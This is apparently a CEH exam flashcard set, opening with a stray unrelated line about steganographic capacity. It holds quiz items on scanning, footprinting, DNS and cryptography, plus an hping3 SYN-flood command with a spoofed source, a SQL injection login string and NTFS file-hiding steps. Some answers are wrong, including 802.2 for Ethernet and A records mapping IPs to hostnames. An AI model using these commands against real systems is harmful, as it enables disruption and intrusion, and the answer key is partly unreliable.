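Capacity is the obvious limit: at 8 bits per line a 3-byte secret already needs 5 lines, so real tools spread bits more thinly to keep the trailing runs short and less conspicuous.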
Nessus
is the vulnerability and configuration assessment product
Eavesdropping
is unauthorized listening of conversations or reading of messages
Ping Sweep
is used to determine the live hosts from a range of IP addresses by sending ICMP ECHO requests to multiple hosts. If a host is live, it will return an ICMP ECHO reply
ID Serve
is used to identify the make, model, and version of any web site's server software, it also used to identify non-HTTP (non-web) Internet servers such as FTP, SMTP, POP, NEWS, etc.
Network scanning
refers to a set of procedures for identifying hosts, ports, and services in a network
Source routing
refers to sending a packet to the intended destination with partially or completely specified route (without firewall / IDS-configured routers) in order to evade IDS/firewall
Competitive intelligence
refers to the information gathered by a business entity about its competitors' customers, products, and marketing
802.11a
runs at up to 54 Mbps at 5 GHz
PsFile
shows files opened remotely
Bastion host
A computer placed outside a firewall to provide public services to other Internet sites and hardened to resist external attacks.
C. The results will display all HTTP traffic from 192.168.1.1
Examine the Wireshark filter shown here: ip.src == 192.168.1.1 && tcp.srcport == 80 Which of the following correctly describes the capture filter? A. The results will display all traffic from 192.168.1.1 destined for port 80. B. The results will display all HTTP traffic to 192.168.1.1 C. The results will display all HTTP traffic from 192.168.1.1. D. No results will display because of invalid syntax.
Software in use and its behavior Scripting platform used
Examining cookies may provide what kind of information?
"initrd"
Horse Pill is a Linux kernel rootkit that resides inside the ___, from which it infects the system and deceives the system owner with the use of container primitives
Application
Layer 7 of OSI model
TCP payload
In reverse ICMP tunneling, the victim's system is triggered to encapsulate ___ in an ICMP echo packet, which is forwarded to the proxy server
C) IDS, packet logger, and sniffer
Snort can perform as a ____? A) IDS, sniffer, and proxy B) IDS, firewall, and sniffer C) IDS, packet logger, and sniffer D) IDS, sniffer, and forensic packet analyzer
Network
The TCP/IP model Internet layer is what in the OSI model layer?
B)No known workaround exists
The security team has been analyzing several vulnerabilities found in the Linux kernel they are using. Any upgrades that can be delayed must be pushed to the next fiscal year. Which of the following describes a vulnerability that would require an immediate kernel upgrade? A)A threat vector can be disabled B)No known workaround exists C)Exists in an unused function D)Known workarounds exist
NS (Name Server)
This record defines the name servers within your namespace. These servers are the ones that respond to your clients' requests for name resolution.
SOA (Start of Authority)
This record identifies the primary name server for the zone. The SOA record contains the hostname of the server responsible for all DNS records within the namespace, as well as the basic properties of the domain.
A (Address)
This record maps an IP address to a hostname and is used most often for DNS lookups.
CNAME (Canonical Name)
This record provides for domain name aliases within your zone.
www.geektools.com www.dnsstuff.com www.samspade.com
Well-known websites for DNS or whois footprinting:
Internet Zone Internet DMZ Production Network Zone Intranet Zone Management Network Zone
What are five examples of Network Security Zones?
eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker Yesware Zendio ContactMonkey Pointofmail Read Notify WhoReadMe DidTheyReadit GetNotify Trace Email G-Lock Analytics
What are some Email Tracking Tools?
[cache:] [link:] [related:] [info:] [site:] [allintitle:] [intitle:] [allinurl:] [inurl:]
What are some Google advance search operators?
Know Security Posture Reduce Focus Area Identify Vulnerabilities Draw Network Map
What are the four main goals of footprinting?
Promiscuous Policy Permissive Policy Prudent Policy Paranoid Policy
What are the four types of Security Policies?
1) Helps in monitoring and detecting network behaviors 2) Detect and recover from security breaches 3) Pays attention to various threats 4) Benefits the organization from a cost perspective 5) Identify assets 6) Helps to perform risk assessment
What are the six goals of EISA?
Something you know Something you have Something you are
What are the three factors of authentication?
C) An attacker who does not care about the consequences of his actions to himself
What is the best description of a suicide hacker? A) An attacker who performs only DoS attacks B) An attacker who posts all his findings for public review C) An attacker who does not care about the consequences of his actions to himself D) An attacker who does not care about the consequences of his actions to others
C) To sniff or analyze traffic
What is the purpose in configuring a span port on a switch? A) To allow multiple devices to connect to one port B) To protect against MAC spoofing C) To sniff or analyze traffic D) To restrict the port to one device connection only
It evaluates the execution of the security plan. It is also called a lessons learned session.
What is the purpose of a post-mortem in a security audit?
To document what was done and to provide a record for review if problems arise
What is the purpose of recording the steps taken when implementing a new system?
Password recovery tool for Windows
What is the purpose of the Cain and Abel tool?
To crack weak passwords
What is the purpose of the John the Ripper tool?
Vulnerability scanning
What is the purpose of the Nessus tool?
Intrusion detection
What is the purpose of the Snort tool?
To check the integrity of system files
What is the purpose of the Tripwire tool?
D)Demonstrates common server-side security flaws
What is the purpose of the WebGoat application? A)Responds to SYN flood attacks B)Probes your network for security issues C)Acts as a honeypot for in the network DMZ D)Demonstrates common server-side security flaws
Port scanning
What is the purpose of the nmap tool?
This Web site is an Internet archiving site that maintains archives of Web sites over many years
What is the purpose of the web site archive.org?
define the scope of the assessment
What is the second step in Pen Testing?
Threat vector
What is the term for the tool or process used to exploit a threat?
Spoofcard (www.spoofcard.com)
What tool can be used to spoof a phone number?
frame
When a recipient system gets a ___, it checks the physical address to see who the message is intended for.
D. Hacktivism
When an attack by a hacker is politically motivated, the hacker is said to be participating in which of the following? A. Black-hat hacking B. Gray-box attacks C. Gray-hat attacks D. Hacktivism
2013090800 = serial number 86400 = refresh interval 900 = retry time 1209600 = expiry time 3600 = defines the TTL for the zone
When looking at a zone transfer you see this line below: hostmaster.anycomp.com (2013090800 86400 900 1209600 3600) What do the numbers mean?
D)ROE
Which documentation provides an ethical hacker with the scope of targets and allowed testing techniques and tools? A)NDA B)PCI C)LPT D)ROE
RSA
Which encryption algorithm is susceptible to a factorization attack?
Port security
Which feature can be enabled on a switch to prevent MAC flooding and MAC spoofing?
snort.config
Which file contains the options for the configuration of the Snort tool?
A. RST
Which flag forces a termination of communications in both directions? A. RST B. FIN C. ACK D. PSH
A. whois
Which footprinting tool or technique can be used to find the names and addresses of employees or technical points of contact? A. whois B. nslookup C. dig D. traceroute
A)MAC flooding D)MAC spoofing
Which of the following attacks can be mitigated by using port security on a switch? (Choose all that apply.) A)MAC flooding B)IP spoofing C)DNS poisoning D)MAC spoofing
C) %windir%\system32\drivers\etc\services
Which of the following contains a listing of port numbers for well-known services defined by IANA? A) %windir%\ext\lists B) %windir%\system32\drivers\etc\lmhosts C) %windir%\system32\drivers\etc\services D) %windir%\system32\drivers\etc\hosts
B)Classes
Which of the following is NOT a component of the Metasploit architecture? A)Interfaces B)Classes C)Libraries D)Modules
A)RC4
Which of the following is NOT a type of block cipher? A)RC4 B)DES C)RC5 D)IDEA
A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide.
Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)? A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide. B. CSIRT provides a computer security surveillance service to supply a government with important intelligence information on individuals traveling abroad. C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by individuals and multinational corporations. D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an individual's property or company's asset.
C)MAC filtering
Which of the following is an access control mechanism that can be implemented on all wireless networks? A)WEP encryption B)WPA/WPA2 encryption C)MAC filtering D)SSID broadcast
PHP
Which of the following is an example of a server-side scripting language?
A. Incident management
Which of the following is best defined as a set of processes used to identify, analyze, prioritize, and resolve security incidents? A. Incident management B. Vulnerability management C. Change management D. Patch management
Netcat
Which of the following is capable of port redirection? Netstat TCPView Netcat Loki
A) SSL works at the Transport layer, and S-HTTP operates at the Application layer.
Which of the following is true regarding SSL and S-HTTP? A) SSL works at the Transport layer, and S-HTTP operates at the Application layer. B) SSL works at the Network layer, and S-HTTP operates at the Application layer. C) SSL works at the Application layer, and S-HTTP operates at the Network layer. D) SSL works at the Application layer, and S-HTTP operates at the Transport layer.
B. It is a passive OS fingerprinting tool.
Which of the following is true regarding the p0f tool? A. It is an active OS fingerprinting tool. B. It is a passive OS fingerprinting tool. C. It is designed to extract metadata for Microsoft files. D. It is designed for remote access.
D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account
Which of the following is true regarding this output? A) Running the command sid2user S A 5 21 861567501 1383384898 839522115 502 will return the name of the true administrator account B) Running the command sid2user S A 5 21 861567500 1383384898 839522115 501 will return the name of the true administrator account C) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 501 will return the name of the true administrator account D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account
ACL
Which of the following is used to set permissions on content in a website?
B) SYN/ACK
Which of the following represents the second step in the TCP three way handshake? A) SYN B) SYN/ACK C) ACK D) ACK/SYN
A)Execute, implant, retract
Which step involves removing additional user accounts created for the attack phase of a penetration test? A)Execute, implant, retract B)Acquire target C)Escalate privileges D)Penetrate perimeter
IPsec
Which technology can provide protection against session hijacking?
Trapdoor
Which term is used to describe the difficulty of factoring a value generated by large key size?
A)Vulnerability scanner
Which tool can help identify out-of-date software versions, missing patches, or system upgrades? A)Vulnerability scanner B)Network sniffer C)Penetration test D)IDS
Vulnerability scanning
Which type of scanning operates proactively to locate issues, utilizes automated processes, and scans and identifies vulnerabilities of all systems present on the network?
TCPView
Which utility will tell you in real time which ports are listening or in another state?
Remote SPAN (RSPAN)
Which version of the SPAN switch configuration sends traffic from multiple ports on multiple switches to a single switch port where the IDS is located?
whois.com
Which web site can be used to determine the owner of a target web site?
B. Operating system
While performing a pen test, you find success in exploiting a machine. Your attack vector took advantage of a common mistake--the Windows 7 installer script used to load the machine left the administrative account with a default password. Which attack did you successfully execute? A. Application level B. Operating system C. Shrink wrap D. Social engineering E. Misconfiguration
C)Hope to be caught
Why is someone called a suicide hacker? A)Hack for a social cause B)Hack and then offer to correct the vulnerability for money C)Hope to be caught D)Hack with permission
To prevent information leakage
Why should you reduce the amount of information provided in error messages?
Promiscuous mode
Wireshark requires a network card to be able to enter which mode to sniff all network traffic?
B)Time-frame analysis
You are responding to an active hacking attack and need to verify whether an insider suspect is involved. Which type of data analysis should you use? A)Data-hiding analysis B)Time-frame analysis C)Application analysis D)File analysis
C)Child pornography
You have been hired to perform a security assessment of the corporate network. Which discovery requires you to contact external authorities immediately? A)Unlicensed software B)Email exchange between married employees C)Child pornography D)Espionage data acquired from another organization
D)SMB
You have been using a network sniffer to monitor the traffic on your network. You examine the results and notice that some devices are communicating over TCP port 445. Which protocol is most likely causing this traffic? A)SSL B)BGP C)NetBIOS D)SMB
A)Deploy a secure remote access solution for employees to connect to the company's internal network
You have decided to implement IPSec for certain types of traffic. Which of the following is the best description of why you would implement this protocol? A)Deploy a secure remote access solution for employees to connect to the company's internal network B)Ensure that the same IP address is always used by a server C)Authenticate both ends of a connection between a client and server D)Establish an encrypted link between a web server and a browser
B)IP spoofing
You perform a ping and receive the following results: Pinging 192.168.10.1 with 32 bytes of data: Reply from 192.168.10.1: bytes=32 time=5ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 During a routine ping test later in the week, you receive a reply packet from the IP address 192.168.10.1, but the TTL value is now 40. What is the most likely reason for this discrepancy? A)DDoS attack B)IP spoofing C)ICMP filtering D)Routing loop
C. Installing WinPcap
You want to begin sniffing, and you have a Windows 7 laptop. You download and install Wireshark but quickly discover your NIC needs to be in "promiscuous mode." What allows you to put your NIC into promiscuous mode? A. Installing lmpcap B. Installing npcap C. Installing WinPcap D. Installing libPcap E. Manipulating the NIC properties through Control Panel | Network and Internet | Change Adapter Settings
B. Gray box
You've been hired as part of a pen test team. During the brief, you learn the client wants the pen test attack to simulate a normal user who finds ways to elevate privileges and create attacks. Which test type does the client want? A. White box B. Gray box C. Black box D. Hybrid
A. Fragmenting
You've decided to begin scanning against a target organization but want to keep your efforts as quiet as possible. Which IDS evasion technique splits the TCP header among multiple packets? A. Fragmenting B. IP spoofing C. Proxy scanning D. Anonymizer
B)Brute-force attack
Your company implemented both symmetric and asymmetric cryptography on its network. As a security professional, you must protect against all types of cryptography attacks. Which attack affects both types of cryptography that are implemented? A)Man-in-the-middle attack B)Brute-force attack C)Session hijacking D)Dictionary attack
routed protocol routing protocol
A ____ is one that is actually being packaged up and moved around (IPv4 and IPv6). A _____ is the one that decides the best way to get to the destination (for example, BGP, OSPF, or RIP).
Proxy server
is an application that can serve as an intermediary for connecting with other computers
client
A computer process that requests a service from another computer and accepts the server's responses.
Data Link layer (Layer 2)
At which layer of the OSI model does an ARP poisoning attack occur?
RST
During a FIN scan, what indicates that a port is closed?
it pulls every record from the DNS server instead of just the one, or one type, you're looking for.
How does a zone transfer using ls -d differ from a normal DNS request?
It extracts (reverse engineers) data points from a graph
How does the tool DataThief operate?
ICMP Ping
Hping Commands: hping3 -1 10.0.0.25
-S
Hping sets the SYN flag
IP spoofing
In what attack does the attacker assume the IP address of a trusted device in an attempt to access protected resources?
Hping Scapy Komodia Ettercap Cain Nmap
What tools can spoof an IP address:
802.2
Which IEEE standard describes Ethernet?
Suicide hacker
Which kind of hacker hopes to be caught?
E. 631
You are examining traffic to see if there are any network-enabled printers on the subnet. Which of the following ports should you be monitoring for? A. 53 B. 88 C. 445 D. 514 E. 631
B)White box
Your organization has contracted with a third-party security firm to assess your network by performing a penetration test. The test is designed to simulate a malicious insider who has complete knowledge of the target system. What type of test is this? A)Green box B)White box C)Gray box D)Black box
Direct TTL Probes
1) Send a packet to the host of the suspect spoofed packet that triggers a reply and compare its TTL with the suspect packet; if the TTL in the reply is not the same as in the packet being checked, it is a spoofed packet 2) This technique is successful when the attacker is in a different subnet from the victim
covert channel
A communications channel that is being used for a purpose it was not intended for, usually to transfer information secretly.
Network (Layer 3)
At which layer of the OSI model does an IP spoofing attack occur?
Network (Layer 3)
At which layer of the OSI model does an attack using a rogue DHCP server occur?
Black hats
Considered the bad guys, these are the crackers, illegally using their skills for either personal gain or malicious intent. They seek to steal (copy) or destroy data and to deny access to resources and systems. Do not ask for permission or consent.
"fragment identification" number (IPID)
Every IP packet on the Internet has a ____
B. The zone copy is unchanged.
Examine the following SOA record: @ IN SOA RTDNSRV1.somebiz.com postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] If a secondary server in the enterprise is unable to check in for a zone update within an hour, what happens to the zone copy on the secondary? A. The zone copy is dumped. B. The zone copy is unchanged. C. The serial number of the zone copy is decremented. D. The serial number of the zone copy is incremented.
gain higher privileges
Exploiting software vulnerabilities allows an attacker to execute a command or binary on a target machine to ___ than the existing ones or to bypass security mechanisms
Audit
Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes.
State Sponsored Hackers
Individuals employed by the government to penetrate and gain top-secret information and to damage information systems of other governments
Advanced Persistent Threats
An attack that focuses on stealing information from the victim machine without the user being aware of it
Pseudonymous footprinting
Make someone else take the blame for your information gathering
Attacks
Motive (Goal) + Method + Vulnerability =
Acceptable use policy (AUP)
Policy stating what users of a system can and cannot do with the organization's assets
UID (User ID) GID (Group ID)
Similar to the SID and RID on a Microsoft Windows machine, but on Linux.
1) The client sends a single SYN packet to the server on the appropriate port 2) If the port is open then the server responds with a SYN/ACK packet 3) If the server responds with an RST packet, then the remote port is in the "closed" state 4) The client sends the RST packet to close the initiation before a connection can ever be established
Stealth Scan Process
Operating system (OS) attacks Application-level attacks Shrink-wrap code attacks Misconfiguration attacks
The 4 Attack Types
decryption
The process of transforming cipher text into plain text through the use of a cryptographic algorithm.
A)Evil twin
To attack a wireless network, an attacker sets up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID. What kind of attack is this? A)Evil twin B)War chalking C)Rogue access point D)WEP attack
Microsoft Outlook www.emailtrackerpro.com www.mailtracking.com
Tools for email footprinting:
Active Passive
What are the two types of banner grabbing?
Risk avoidance
What happens when an organization decides to cease an activity or process that creates a risk?
Scanning
What phase comes after footprinting?
Single-factor authentication
What type of authentication is being performed when both a username and a password are required?
B)RC4
What type of encryption does the Syskey utility utilize? A)RC6 B)RC4 C)RC5 D)RC2
B)Tripwire
Which of the following tools is a System Integrity Verifier? A)Nessus B)Tripwire C)ZoneAlarm D)Snort
Remote Procedure Call (RPC)
allows client and server to communicate in distributed client/server programs
Procedures
are detailed step-by-step instructions for accomplishing a task or goal.
Guidelines
are flexible recommended actions users are to take in the event there is no standard to follow.
Standards
are mandatory rules used to achieve consistency.
Network Tools Pro
assists in troubleshooting, diagnosing, monitoring, and discovering devices on the network
Access control
basically means restricting access to a resource in some selective manner.
Drawing Network Diagrams
gives valuable information about the network and its architecture to an attacker
IP geolocation
helps to identify information such as country, region/state, city, ZIP/postal code, time zone, connection speed, ISP (hosting company), domain name, IDD country code, area code, mobile carrier, elevation, etc.
Finds the Linksys VoIP router configuration page
inurl:/voice/advanced/ intitle:Linksys SPA configuration
Sniffing (also called wiretapping)
is the art of capturing packets as they pass on a wire, or over the airwaves, to review for interesting information.
IPsec
uses ESP (Encapsulation Security Payload), AH (Authentication Header) and IKE (Internet Key Exchange) to secure communication between virtual private network (VPN) end points
Active reconnaissance
uses tools and techniques that may or may not be discovered but put your activities as a hacker at more risk of discovery.
Nondisclosure agreement (NDA)
What type of agreement ensures the hacker will not disclose any information found during the test?
Passive Banner Grabbing
-Banner grabbing from error messages -Sniffing the network traffic -Banner grabbing from page extensions
C)Three-tier
-Each layer must be able to exist on a physically independent system -Each layer should exchange information only with the layers above and below it -There is a presentation layer, a logic layer, and a data layer Which system architecture has the above characteristics? A)Sandboxing B)Three-legged C)Three-tier D)Defense in depth
SYN ping
-PS
TCP ping
-PT
Serial, normal speed scan
-T2
A. Use HTTP tunneling.
A security administrator is attempting to "lock down" her network and blocks access from internal to external on all external firewall ports except for TCP 80 and TCP 443. (FTP, as well as some nonstandard port numbers). Which of the following is the most likely choice the user could attempt to communicate with the remote systems over the protocol of her choice? A. Use HTTP tunneling. B. Send all traffic over UDP instead of TCP. C. Crack the firewall and open the ports required for communication. D. MAC flood the switch connected to the firewall.
Protection profile (PP)
A set of security requirements specifically for the type of product being tested
crypter
A software tool that uses a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products.
check the filtering system
ACK flag probe scanning can also be used to ___ of the target
records all keystrokes typed, IM chats, websites visited
Amac Keylogger for Mac invisibly ___, takes screenshots, and sends all reports to the attacker by email or uploads everything to the attacker's website
D. Archive.org
Amanda works as senior security analyst and overhears a colleague discussing confidential corporate information being posted on an external website. When questioned on it, he claims about a month ago he tried random URLs on the company's website and found confidential information. Amanda visits the same URLs but finds nothing. Where can Amanda go to see past versions and pages of a website? A. Search.com B. Google cache C. Pasthash.com D. Archive.org
Anonymizers
An _____ removes all the identifying information from the user's computer while the user surfs the Internet
B. The web application returned the first record it found
An administrator enters admin' or '1'='1 in the email field of a web page. A message appears stating "Your login information has been mailed to [email protected]" What has most likely occurred? A. The web application picked a record at random B. The web application returned the first record it found C. A server error has caused the application to malfunction D. The web application emailed the administrator about the error
C)14-character passwords will take only slightly longer to crack than the 8-character passwords
Due to the need to support legacy systems, you have been forced to rely on LAN Manager password security. To ensure that users' passwords are strong enough, you plan to use John the Ripper to crack the passwords after obtaining the SAM files from the domain controllers. One of the domains requires 14 characters in the password, while another domain requires only 8. Which of the following statements is true? A)14-character passwords will take much longer to crack than the 8-character passwords B)14-character and 8-character passwords will take exactly the same amount of time to crack C)14-character passwords will take only slightly longer to crack than the 8-character passwords D)8-character passwords will take longer to crack than the 14-character passwords
1) Restrict the interactive logon privileges 2) Use encryption techniques to protect sensitive data 3) Run users and applications with the least privileges 4) Reduce the amount of code that runs with particular privilege 5) Implement multi-factor authentication and authorization 6) Perform debugging using bounds checkers and stress tests 7) Run services as unprivileged accounts 8) Test operating system and application coding errors and bugs thoroughly 9) Implement a privilege separation methodology to limit the scope of programming errors and bugs 10) Patch and update the kernel regularly 11) Change User Account Control settings to "Always Notify" 12) Restrict users from writing files to the search paths for applications 13) Continuously monitor file system permissions using auditing tools 14) Reduce the privileges of users and groups so that only legitimate administrators can make service changes 15) Use whitelisting tools to identify and block malicious software 16) Use fully qualified paths in all Windows applications 17) Ensure that all executables are placed in write-protected directories 18) In Mac operating systems, make plist files read-only 19) Block unwanted system utilities or software that may be used to schedule tasks 20) Patch and update the web servers regularly
How to defend against privilege escalation
SYN scan on port 50-60
Hping Commands: hping3 -8 50-60 -S 10.0.0.25 -V
Intercept all traffic containing HTTP signature
Hping Commands: hping3 -9 HTTP -I eth0
ACK scan on port 80
Hping Commands: hping3 -A 10.0.0.25 -p 80
FIN, PUSH and URG scan on port 80
Hping Commands: hping3 -F -P -U 10.0.0.25 -p 80
SYN flooding a victim
Hping Commands: hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood
Firewalls and Timestamps
Hping Commands: hping3 -S 72.14.207.99 -p 80 --tcp-timestamp
Collecting Initial Sequence Number
Hping Commands: hping3 192.168.1.103 -Q -p 139 -s
-1
Hping sets ICMP mode
higher level permissions
If the process that is executing this binary has ___, then the malicious binary also executes under higher level permissions
nbtstat -n
If you want to bring up name table on your machine using NetBIOS.
CareerBuilder.com Monster.com Dice.com
If you want to find information about a company's technical infrastructure you can look where?
nbtstat -c
If you want to show the cache using NetBIOS.
Least Significant Bit Insertion Masking and Filtering Algorithms and Transformation
Image File Steganography Techniques
OpenStego QuickStego CrytaPix Hide In Picture gifshuffle PHP-Class Stream Steganography
Image Steganography Tools
loading an external dylib (dynamic library)
In OS X, when an application is ___, the loader searches for the dylib in multiple directories
bit flipping
In ____, the attacker isn't interested in learning the entirety of the plain-text message. Instead, bits are manipulated in the cipher text itself to generate a predictable outcome in the plain text once it is decrypted.
Administrative safeguards
In a risk assessment, data classification and background checks are examples of which type of safeguard?
information is hidden in image
In image steganography, the ___ files of different formats such as .PNG, .JPG, .BMP, etc
Internet DMZ
In networking, it's a controlled buffer network between you and the uncontrolled chaos of the Internet.
black-box testing
In penetration testing, a method of testing the security of a system or subnet without any previous knowledge of the device or network. It is designed to simulate an attack by an outside intruder (usually from the Internet).
Evil Twin
In what type of attack does an attacker set up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID?
Hiding files
In which CEH hacking stage do you use steganography?
send a "SYN" (session establishment)
One way to determine whether a port is open is to ___ packet to the port
E. SOA (Start of Authority)
One way to mitigate against DNS poisoning is to restrict or limit the amount of time records can stay in cache before they're updated. Which DNS record type allows you to set this restriction? A. NS B. PTR C. MX D. CNAME E. SOA
Stealth (also called half-open scan or SYN scan)
Only SYN packets are sent to ports (no completion of the three-way handshake ever takes place).
C. They are mitigating the risk
Organization leadership is concerned about social engineering and hires a company to provide training for all employees. How is the organization handling the risk associated with social engineering? A. They are accepting the risk. B. They are avoiding the risk. C. They are mitigating the risk. D. They are transferring the risk.
bypass firewall
Organizations have security mechanisms that only check incoming ICMP packets but not outgoing ICMP packets, therefore attackers can easily ___.
Conduct
Other than Preparation and Conclusion, what is the third phase of the Software Assurance Maturity Model?
Internet
Outside the boundary and uncontrolled. You don't apply security policies to this zone.
This flag forces the delivery of data to communications.
PSH (Push)
gathering of competitive intelligence, using search engines, perusing social media sites, dumpster diving, gaining network ranges, raiding DNS information
Passive footprinting methods
SmartWhois Domain Dossier
Perform WHOIS footprinting using tools such as ___, etc. to create a detailed map of the organizational network, to gather personal information that assists in performing social engineering, and to gather other internal network details
eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker
Perform email footprinting using tools such as ___, etc. to gather information about the physical location of an individual in order to perform social engineering, which in turn may help in mapping the target organization's network
Path Analyzer Pro VisualRoute Network Pinger
Perform network footprinting using tools such as ___, etc. to create a map of the target's network
HTTrack Web Site Copier BlackWidow Webripper
Perform website footprinting using tools such as ___, etc. to build a detailed map of the website's structure and architecture
Angry IP Scanner SolarWinds Engineer Toolset's Ping Sweep Colasoft Ping Tool Advanced IP Scanner Visual Ping Tester - Standard Ping Sweep Ping Scanner Pro Network Ping OpUtils Ping Monitor PingInfoView Pinkie
Ping Sweep Tools
locating active devices firewall
Ping scan is useful for ____ or determining if ICMP is passing through a ___
A or AAAA
Points to a host's IP address
MX
Points to domain's mail server
TFTP (UDP)
Port number 69
secretly monitors and records all activities
Power Spy ___ on your computer
Proxy Switcher Proxy Workbench TOR CyberGhost SocksChain Fiddler Burp Suite Proxy Proxifier Protoport Proxy Chain Proxy Tool Windows App ProxyCap Charles CCProxy
Proxy Tools
Doxing
Publishing personally identifiable information about an individual collected from publicly available databases and social media
A)Smurf attack
Recently, your company's security practitioner suggested that you disable all routers from accepting broadcast ping messages. Which type of attack will this protect against? A)Smurf attack B)TCP RST attack C)MITM attack D)OSPF attack
modify the registry, change local admin passwords, disable local accounts
RemoteExec allows attackers to ___, and copy/update/delete files and folders
"all hosts" link local multicast address
Scanning an IPv6 network, however, offers a large number of hosts in a subnet; if an attacker can compromise one host in the subnet, the attacker can probe the ___
Nmap
Scanning Tool
dialers, port scanners, network mappers, ping tools, vulnerability scanners
Scanning can use what type of tools
IPv6
Scanning in __ networks is more difficult and complex than in IPv4, and some scanning tools do not support ping sweeps on __ networks
Nmap Angry IP Scanner SolarWinds Engineer Toolset Network Ping OPUtils SuperScan Advanced IP Scanner Pinkie
Scanning tools (ping sweep, etc):
Qualys FreeScan
Scans computers and apps on the Internet or in your network Tests websites and apps for OWASP Top Risks and malware
PsLoggedOn
See who's logged on locally and via resource sharing
bluejacking
Sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, and laptop computers.
Viruses
Social engineering can use all the following except ____ Mobile phones Instant messaging Trojan horses Viruses
Eavesdropping, Shoulder surfing, Dumpster diving, Impersonation on social networking sites
Social engineering techniques:
Adware
Software that has advertisements embedded within it. It generally displays ads in the form of pop-ups.
Guardster Ultrasurf Psiphon Tails
Some anonymizers:
Company websites and employment ads; Search engines, Internet, and online DB; Press releases and annual reports; Trade journals, conferences, and newspapers; Patents and trademarks; Social engineering employees; Product catalogues and retail outlets; Analyst and regulatory reports; Customer and vendor interviews; Agents, distributors, and suppliers
Sources of competitive intelligence
communicate secretly
Spam emails help to ___ by embedding the secret messages in some way and hiding the embedded data in the spam emails
B) UDP 514
Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 514 C) UDP 110 D) TCP 161 E) TCP 514
-Open the command prompt with elevated privileges -Type the command "type C:\SecretFile.txt > C:\LegitFile.txt:SecretFile.txt" (Here, the file is kept on the C drive, where SecretFile.txt is hidden inside LegitFile.txt as an alternate data stream) -To view the hidden file, type "more < C:\LegitFile.txt:SecretFile.txt" (For this you need to know the hidden stream name)
Steps to hide file using NTFS
cipher text
Text or data in its encrypted form; the result of plain text being input into a cryptographic algorithm.
sh-compatible shell
Bash is an ___ which stores command history in a file called bash_history
IDS/Firewall
The IP address decoy technique makes it difficult for the ____ to determine which IP address was actually scanning the network and which IP addresses were decoys
D. DNS poisoning
The IT staff is notified that the company's website has been defaced. A security employee, working from home, visits the site and sees the message "YOU HAVE BEEN HACKED" on the front page. He then reboots the system, VPNs to the internal network, and visits the site again, this time noticing nothing out of place. What is the most likely explanation? A. ARP poisoning B. MAC poisoning C. SQL injection D. DNS poisoning
A)Microsoft Windows
The MBSA vulnerability tool is specifically designed to locate potential exploits in which operating systems? A)Microsoft Windows B)Mac OS X C)Cisco IOS D)UNIX/Linux
Reconnaissance Scanning and Enumeration Gaining Access <-- Escalation of Privileges Maintaining Access Covering Tracks
The Phases of ethical hacking
SYN/FIN Scanning Using IP Fragments
The TCP header is split into several packets so that the packet filters are not able to detect what the packets intend to do
Application Presentation Session
The TCP/IP model Application layer is what in the OSI model layer?
Data Link Physical
The TCP/IP model Network Access layer is what in the OSI model layer?
Transport
The TCP/IP model Transport layer is what in the OSI model layer?
private
The ___ community string is used for read-write.
SAM
The ___ database holds encrypted versions of all the local passwords for accounts on the machine.
performance and CPU optimizations
The ___ in the processors such as branch prediction, out of order execution, caching, and speculative execution lead to these vulnerabilities
preparation
The ___ phase defines the time period during which the actual contract is hammered out. The scope of the test, the types of attacks allowed, and the individuals assigned to perform the activity are all agreed upon.
conclusion or post-assessment
The ___ phase defines the time when final reports are prepared for the customer, detailing the findings of the tests (including the types of tests performed) and many times even providing recommendations to improve security.
Accountability
The ability to trace actions performed on a system to a specific user or system entity.
Hacktivism
The act or actions of a hacker to put forward a cause or a political agenda, to affect some societal change, or to shed light on something he feels to be a political injustice. These activities are usually illegal in nature.
Refresh time
The amount of time a secondary DNS server will wait before asking for updates. The default value is 3,600 seconds (1 hour).
Retry time
The amount of time a secondary server will wait to retry if the zone transfer fails. The default value is 600 seconds.
escalate privileges
The attacker can ______ to obtain complete control of the system. In the process, intermediate systems that are connected to it are also compromised
Continuing access Unnoticed and uncaught
The attacker's intentions include: ____ to the victim's system, remaining ____, deleting evidence that might lead to his prosecution
Discretionary access control (DAC)
The basis of this kind of security is that an individual user, or program operating on the user's behalf, is allowed to specify explicitly the types of access other users (or programs executing on their behalf) may have to information under the user's control.
Least Significant Bit Insertion
The binary data of the message is broken and inserted into the LSB of each pixel in the image file in a deterministic sequence
Availability
The condition of a resource being ready for use and accessible by authorized users.
Transformation
The data is embedded in the cover image by changing the coefficients of a transform of an image
Active Directory (AD)
The directory service created by Microsoft for use on its networks. It provides a variety of network services using Lightweight Directory Access Protocol (LDAP), Kerberos-based authentication, and single sign-on for user access to network-based resources.
A)All of these
The following access list is applied to an interface on a Cisco router: access-list 1 permit 192.168.5.0 0.0.255.255 access-list 1 deny host 192.168.5.2 Which of the following IP addresses would be allowed through the interface? A)All of these B)192.168.5.2 C)None of the above D)192.168.7.20 E)192.168.10.60 F)192.168.5.5
Expire time
The maximum amount of time a secondary server will spend trying to complete a zone transfer. The default value is 86,400 seconds (1 day).
TTL (Time To Live)
